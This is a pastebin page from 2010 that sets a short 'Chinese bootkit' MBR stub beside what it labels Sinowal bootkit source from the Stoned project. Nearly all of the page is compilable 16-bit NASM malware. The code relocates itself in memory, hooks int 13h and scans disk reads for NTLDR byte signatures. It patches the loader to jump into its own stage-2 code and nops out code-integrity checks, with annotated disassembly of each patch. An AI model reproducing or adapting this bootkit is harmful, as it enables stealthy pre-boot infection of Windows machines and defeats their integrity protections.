Part of Slepp's ProjectsPastebinTURLImagebinFilebin
Feedback -- English French German Japanese
Create Upload Newest Tools Donate
Sign In | Create Account

Paste Actions

Download Raw
Embed
pBox URL
Post to Twitter
Remove Paste

Paste Details

Assembly (NASM) format, 1 year 7 months old, and 477 hits.

Paste Description for China Bootkit Source

Comparison, Sinowal Analysis vs Chinese Bootkit Source

China Bootkit Source
Saturday, June 19th, 2010 at 6:17:15am MDT 

  1. [Stolen Source]
  2.  
  3. ; create 16 bit code and assembly only instructions up to 386 instruction set
  4. [bits 16]
  5. CPU 386
  6.  
  7. xor     ax, ax
  8. mov     ss, ax
  9. mov     sp, 7C00h
  10. sti
  11. push    ax
  12. pop     es
  13. push    ax
  14. pop     ds
  15.  
  16. push ds
  17. pushad
  18.  
  19. cld
  20. mov     si, 7C1Bh
  21. mov     di, 61Bh
  22. push    ax
  23. push    di
  24. mov     cx, 1E5h
  25. rep movsb
  26. retf
  27.  
  28. xor bx,bx
  29. mov es,bx                                               ; segment 0
  30. mov ax,0x201                                            ; function read sectors, read 1 sector
  31. mov cx,10                                               ; read original boot code (sector 10), boot sector
  32. mov dx,80h                                              ; boot drive
  33. mov bh,0x7c                                             ; address 7C00h
  34. int 13h
  35. popad
  36. pop ds
  37. ; execute original Master Boot Record
  38. jmp word 0000h:7C00h
  39.  
  40.  
  41.  
  42. times 510-($-$$)  db 0
  43.  
  44. Boot_Signature            dw  0AA55h
  45.  
  46.  
  47.  
  48.  
  49. [Original]
  50.  
  51. ;  Sinowal Bootkit
  52.  
  53. ;  called "Banken Rootkit" or referred as "Banken Trojaner"
  54.  
  55. ;  www.viennacomputerproducts.com/reverseengineering
  56.  
  57.  
  58. ; compilable version, Stoned-Project (www.stoned-vienna.com)
  59. ;   - Attacking Windows XP
  60. ;   - Memory resistent up to Windows Kernel
  61. ;   - loads payload from hard disk
  62.  
  63.  
  64. ; create 16 bit code and assembly only instructions up to 386 instruction set
  65. [bits 16]
  66. CPU 386
  67.  
  68. ; no origin used, this code is portable
  69.  
  70.  
  71. cli
  72. xor bx,bx
  73.  
  74. ; set up a new clean stack
  75. mov ss,bx
  76. mov [ss:7BFEh],sp
  77. mov sp,7BFEh
  78.  
  79. ; store registers - will be later restored when executing original MBR
  80. push ds
  81. pushad
  82.  
  83. cld
  84.  
  85. ; copy itself to end of memory
  86. ;   BIOS Data Area: MEM 0040h:0013h - BASE MEMORY SIZE IN KBYTES
  87. mov ds,bx
  88. mov si,0x413                                            ; linear address of 0040h:0013h
  89. sub [si],word 2                                         ; -  2048 kbytes, 4 sectors
  90. lodsw
  91. shl ax,6
  92. mov es,ax                                               ; es = address of free memory (2048 bytes)
  93. mov si,7C00h
  94. xor di,di
  95. mov ecx,256                                             ; copy 512 bytes (the bootloader)
  96. rep movsw
  97.  
  98. ; read boot virus data! (appending the new memory to the moved bootloader sector)
  99. mov ax,0x202                                            ; function read sectors, read 2 sectors
  100. mov cl,61                                               ; sector 60, 2 data stuff sectors
  101. mov dx,80h                                              ; boot drive (default)
  102. mov bx,di                                               ;  = pointer after the 512 copied bytes
  103. int 13h
  104.  
  105. ; hook int 13h
  106. xor bx,bx
  107. mov eax,[bx + 13h * 4]                                  ; IVT, vector 13h
  108. mov [bx + 13h * 4],word Interrupt_Vector_13_hook        ; new address to jump to on "int 13h" instruction
  109. mov [es:Interrupt_Vector_13_Return_Address + 3],eax     ; store the old jump address
  110. mov [bx + 13h * 4 + 2],es                               ; set segment to jump to on int 13h
  111.  
  112. ; set address of copy
  113. push es
  114. push word Relocated_Bootloader
  115.  
  116. ; ..and jump to copy
  117. retf
  118.  
  119.  
  120. Relocated_Bootloader:
  121.  
  122. ; read original master boot record of Windows and execute it
  123. sti
  124. mov es,bx                                               ; segment 0
  125. mov ax,0x201                                            ; function read sectors, read 1 sector
  126. mov cx,63                                               ; read original boot code (sector 62), boot sector
  127. mov dx,80h                                              ; boot drive
  128. mov bh,0x7c                                             ; address 7C00h
  129. int 13h
  130.  
  131. ; restore registers
  132. popad
  133. pop ds
  134. pop sp
  135.  
  136. ; execute original Master Boot Record
  137. jmp word 0000h:7C00h
  138.  
  139.  
  140.  
  141. ; now our background "service" starts, we get control only by int 13
  142. ; the code is now located at the end of memory (most likely 9F400h)
  143.  
  144.  
  145. Interrupt_Vector_13_hook:
  146.  
  147. pushf                                                   ; Interrupt Vector 13 hook
  148.  
  149. ; check if functions "Read" or "Extended Read" are requested
  150. cmp ah,42h                                              ; Extended Read?
  151. jz Handle_Int13_Function
  152. cmp ah,2h                                               ; Read
  153. jz Handle_Int13_Function                                ; ...or read!
  154.  
  155. popf
  156.  
  157. Interrupt_Vector_13_Return_Address:
  158.  
  159. ; jump to the original Int 13h handler (segment:offset will be patched dynamical)
  160. jmp word 0000h:0000h
  161.  
  162.  
  163. Handle_Int13_Function:
  164.  
  165. ; execute int 13h read
  166. mov [cs:Int_Patch_Function_Number + 1],ah               ; store function number (patch)
  167. popf
  168. pushf                                                   ; simulate "int 13h" instruction (store flags)
  169. call [cs:Interrupt_Vector_13_Return_Address + 1]        ; forward the read sector command and return here
  170. jc Exit_Int13_hook_ret                                  ; if error => exit to user
  171.  
  172. ; set environment for int 13h hook handler
  173. pushf
  174. cli
  175. push es
  176. pushad                                                  ; push register contents, we modify it in our hook handler
  177. cld
  178.  
  179. ; load int 13h parameters set by user (and note normalize the param differences between normal read and extended read)
  180. mov ah,0                                                ; transfered sectors (read: al, extended read: disk address packet.02h)
  181. Int_Patch_Function_Number:
  182. mov ch,0                                                ; restore function number (from the patch applied at @7A)
  183. cmp ch,42h                                              ; if extended read special load values
  184. jnz Int_Params_normalized
  185.  
  186. Extended_Read_set_Disk_Address_Packet:
  187. lodsw                                                   ; load values from disk address packet
  188. lodsw                                                   ;   +02h = [word] number of blocks to transfer
  189. les bx,[si]                                             ;   +04h = transfer buffer
  190.  
  191. Int_Params_normalized:
  192. test ax,ax                                              ; ax = number of sectors transfered
  193. jnz Int_Params_SectorCount_set
  194. inc ax                                                  ; sector count = minimum 1
  195. Int_Params_SectorCount_set:
  196.  
  197.  
  198. ; now scan the read buffer for the signature of ntldr
  199. ;    ++   8B F0 85 F6 74 21/22 80 3D
  200. ;         ===>   Windows XP.NTLDR +26B9Fh
  201. mov cx,ax
  202. shl cx,0x9                                              ; sectors * 512
  203. mov al,0x8b                                             ;   scan byte
  204. mov di,bx                                               ; data buffer offset of sector
  205. pusha
  206. Scan_Read_Sector_loop:
  207. repne scasb                                             ; scan Bootloader for 8Bh
  208. jnz NTLDR_delete_routine                                ;   if not found ecx=0 => exit
  209. nop
  210. cmp [es:di],dword 0x74f685f0                            ; check around signatures
  211. jnz Scan_Read_Sector_loop                               ; if not matching => next try
  212. cmp [es:di+0x5],word 0x3d80
  213. jnz Scan_Read_Sector_loop                               ; if not matching => next try
  214. mov al,[es:di+0x4]
  215. cmp al,0x21
  216. jz Found_File_to_Infect
  217. cmp al,0x22
  218. jnz Scan_Read_Sector_loop
  219.  
  220. Found_File_to_Infect:
  221. mov si,20Bh
  222. cmp [cs:si],byte 0                                      ; in virus data (2 sectors)
  223. jnz NTLDR_delete_routine                                ; if already infected => exit
  224. mov [cs:si],al                                          ;    mark as infected and set in missing code byte
  225.  
  226. ; infect ntldr
  227. mov [es:di-0x1],word 15FFh                              ; ntldr (the code which jumps to the pointer)
  228. mov eax,cs
  229. shl eax,4
  230. add ax,0x200
  231. mov [cs:0x1fc],eax                                      ; set the pointer (this resides in ourself)
  232. sub ax,0x4
  233. mov [es:di+1],eax                                       ; ntldr (the code which jumps to the pointer)
  234.  
  235. ;   0x9F4DB  INFECTION    written to 46B9F      on disk @ntldr.26B9Fh       FF 15, opcode.call dword
  236. ;   0x9F4EB  INFECTION    written to 9F5FC      on disk sector 0 at end     pointer to PM code (* = memory.9F600h, disk.sector60)
  237. ;   0x9F4F3  INFECTION    written to 46BA1      on disk @ntldr.26BA1h       pointer to the pointer
  238.  
  239. ;  ; infected code in ntldr is now:      @ntldr.26B9Fh
  240. ;  00046b9f: (  32 Bit Code   w   ): call dword ptr ds:0x9f5fc       ; ff15fcf50900
  241. ;  00046ba5: (  32 Bit Code   inv ): cmp byte ptr ds:0x43aef8, 0x00  ; 803df8ae430000
  242. ;  00046bac: (  32 Bit Code   inv ): jz .+0x00000007                 ; 7407
  243. ;  00046bae: (  32 Bit Code   inv ): xor esi, esi                    ; 33f6
  244. ;  00046bb0: (  32 Bit Code   inv ): jmp .+0x00000255                ; e955020000
  245.  
  246. ;  ; and was original:                   @ntldr.26B9Fh
  247. ;  00046b9f: (  32 Bit Code       ): mov esi, eax              ; 8bf0
  248. ;  00046ba1: (  32 Bit Code       ): test esi, esi             ; 85f6
  249. ;  00046ba3: (  32 Bit Code       ): jz .+0x00000021           ; 7421
  250. ;  00046ba5: (  32 Bit Code       ): cmp byte ptr ds:0x43aef8, 0x00 ; 803df8ae430000
  251. ;  00046bac: (  32 Bit Code       ): jz .+0x00000007           ; 7407
  252.  
  253. ;  ; the infected code in the ntldr will be relocated to protected mode memory 0x00422a6f
  254. ;  ; it will jump to 9F600h which is stage 2 (executed by ntldr)
  255. ;  00422a6f: (                    ): call dword ptr ds:0x9f5fc ; ff15fcf50900
  256.  
  257.  
  258. ; scan the read buffer for a part of the ntldr
  259. ;    ++   83  C4 02 E9 00 00 E9 FD FF
  260. ;         ===>   Windows XP.NTLDR +1C81h
  261. ;         ===>   Windows XP.NTLDR +1C9Ch    this is the real searched one
  262. NTLDR_delete_routine:
  263. popa
  264. mov al,0x83
  265. ; *** PROGRAMMING ERROR ***
  266. ; *** EDI AND ECX ARE NOT RESETTED HERE, IF MICROSOFT WOULD READ NTLDR AT ONCE THIS WOULD FAIL ***
  267.  
  268. Scan_Sector_loop_2:
  269. repne scasb
  270. jnz Restore_Flags_and_exit                                    ; if not found exit
  271. cmp [es:di],dword 00E902C4h
  272. jnz Scan_Sector_loop_2
  273. cmp [es:di+0x4],dword 0FFFDE900h
  274. jnz Scan_Sector_loop_2
  275. mov [es:di-0x4],dword 83909090h                               ; set 3 bytes to instruction nop
  276. and [es:di+0x6],word 0                                        ; modify jump operation, set highest byte to zero
  277. jmp short Scan_Sector_loop_2                                  ; our signature occurs 2 times
  278.  
  279. ; 1. @ntldr.1C81h
  280.  
  281. ;  ; memory dump, @ntldr.1C81h, memory.21c81
  282. ;  0x0000000000021c7e <bogus+       0>:    0xe8    0x39    0x0c    0x83    0xc4    0x02    0xe9    0x00
  283. ;  0x0000000000021c86 <bogus+       8>:    0x00    0xe9    0xfd    0xff
  284.  
  285. ;  ; memory disassembly, @ntldr.1C81h, memory.21c81
  286. ;  00021c7d: (  32 Bit Code   inv ): sbb eax, ebp                      ; 19e8        INVALID
  287. ;  00021c7f: (  32 Bit Code       ): cmp dword ptr ds:[ebx+eax*4], ecx ; 390c83
  288. ;  00021c82: (  32 Bit Code       ): les eax, ds:[edx]                 ; c402
  289. ;  00021c84: (  32 Bit Code       ): jmp .+0xfde90000                  ; e90000e9fd
  290.  
  291. ;  ; modified memory dump
  292. ;  0x0000000000021c7e <bogus+       0>:    0x90    0x90    0x90    0x83    0xc4    0x02    0xe9    0x00
  293. ;  0x0000000000021c86 <bogus+       8>:    0x00    0xe9    0x00    0x00
  294.  
  295. ;  ; modified disassembly
  296. ;  00021c7e: (                    ): nop                       ; 90
  297. ;  00021c7f: (                    ): nop                       ; 90
  298. ;  00021c80: (                    ): nop                       ; 90
  299. ;  00021c81: (                    ): add esp, 0x00000002       ; 83c402
  300. ;  00021c84: (                    ): jmp .+0x00e90000          ; e90000e900
  301.  
  302. ; 2. @ntldr.1C9Ch
  303.  
  304. ;  ; memory dump, @ntldr.1C9Ch, memory.21c9c
  305. ;  0x0000000000021c99 <bogus+       0>:    0xe8    0x1e    0x0c    0x83    0xc4    0x02    0xe9    0x00
  306. ;  0x0000000000021ca1 <bogus+       8>:    0x00    0xe9    0xfd    0xff
  307.  
  308. ;  ; memory disassembly, @ntldr.1C9Ch, memory.21c9c
  309. ;  00021c98: (  32 Bit Code   inv ): sbb eax, ebp              ; 19e8        INVALID
  310. ;  00021c9a: (  32 Bit Code       ): push ds                   ; 1e
  311. ;  00021c9b: (  32 Bit Code       ): or al, 0x83               ; 0c83
  312. ;  00021c9d: (  32 Bit Code       ): les eax, ds:[edx]         ; c402
  313. ;  00021c9f: (  32 Bit Code       ): jmp .+0xfde90000          ; e90000e9fd
  314.  
  315. ;  ; modified memory dump
  316. ;  0x0000000000021c99 <bogus+       0>:    0x90    0x90    0x90    0x83    0xc4    0x02    0xe9    0x00
  317. ;  0x0000000000021ca1 <bogus+       8>:    0x00    0xe9    0x00    0x00
  318.  
  319. ;  ; modified disassembly
  320. ;  00021c99: (  32 Bit Code       ): nop                       ; 90
  321. ;  00021c9a: (  32 Bit Code       ): nop                       ; 90
  322. ;  00021c9b: (  32 Bit Code       ): nop                       ; 90
  323. ;  00021c9c: (  32 Bit Code       ): add esp, 0x00000002       ; 83c402
  324. ;  00021c9f: (  32 Bit Code       ): jmp .+0x00e90000          ; e90000e900
  325.  
  326. ; the modification is done to bypass code integrity verification (even it's not evident from the patched lines)
  327.  
  328.  
  329. Restore_Flags_and_exit:                                       ; everything done, exit interrupt 13h hook
  330. popad
  331. pop es
  332. popf
  333.  
  334. Exit_Int13_hook_ret:
  335. retf 2                                                        ; simulate "iretw" instruction, to preserve flags (especially flags.CF)
  336.  
  337.  
  338.  
  339.  
  340. ; language descriptions [unset]
  341.  
  342. times 1B5h-($-$$) db 0
  343.  
  344.  
  345. ; Microsoft Error linguistic messages [unused]
  346.  
  347. Error_Message_1_length  db  0
  348. Error_Message_2_length  db  0
  349. Error_Message_3_length  db  0
  350.  
  351.  
  352. ; Microsoft Disk Signature
  353.  
  354. times 440-($-$$)  db 0
  355.  
  356. disk_signature    dd  00000000h                   ; will be set/corrected by infector
  357.                   dw  0
  358.  
  359.  
  360. ; Partition Table, 16 bytes each entry
  361.  
  362. times 1BEh-($-$$) db 0
  363.  
  364. Partition_Table_Entry_1:
  365.     Partition_1_bootable  db  80h                 ; default boot partition (MS Windows)
  366.     Partition_1_Start_CHS db  01, 01, 00
  367.     Partition_1_Type      db  7                   ; NTFS file system
  368.     Partition_1_End_CHS   db  0FEh, 0BFh, 08h
  369.     Partition_1_Start_LBA dd  63                  ; NTFS file system starts, boot sector
  370.     Partition_1_Sectors   dd  8AB67Fh             ; = 4 GB  (9090687 * 512 / 1024 / 1024 / 1024)
  371. Partition_Table_Entry_2:
  372.     Partition_2_bootable  db  0
  373.     Partition_2_Start_CHS db  0, 0, 0
  374.     Partition_2_Type      db  0
  375.     Partition_2_End_CHS   db  0, 0, 0
  376.     Partition_2_Start_LBA dd  0
  377.     Partition_2_Sectors   dd  0
  378. Partition_Table_Entry_3:
  379.     Partition_3_bootable  db  0
  380.     Partition_3_Start_CHS db  0, 0, 0
  381.     Partition_3_Type      db  0
  382.     Partition_3_End_CHS   db  0, 0, 0
  383.     Partition_3_Start_LBA dd  0
  384.     Partition_3_Sectors   dd  0
  385. Partition_Table_Entry_4:
  386.     Partition_4_bootable  db  0
  387.     Partition_4_Start_CHS db  0, 0, 0
  388.     Partition_4_Type      db  0
  389.     Partition_4_End_CHS   db  0, 0, 0
  390.     Partition_4_Start_LBA dd  0
  391.     Partition_4_Sectors   dd  0
  392.  
  393.  
  394. ; here -2 values from the boot signature we will store a pointer
  395.  
  396.  
  397. times 510-($-$$)  db 0
  398.  
  399. Boot_Signature            dw  0AA55h

Paste Details

Tags: source china bootkit

advertising

Update the Post

Either update this post and resubmit it with changes, or make a new post.

You may also comment on this post.

update paste below
details of the post (optional)

Note: Only the paste content is required, though the following information can be useful to others.

Save name / title?

(space separated, optional)



Please note that information posted here will expire by default in one month. If you do not want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords. All illegal activities will be reported and any information will be handed over to the authorities, so be good.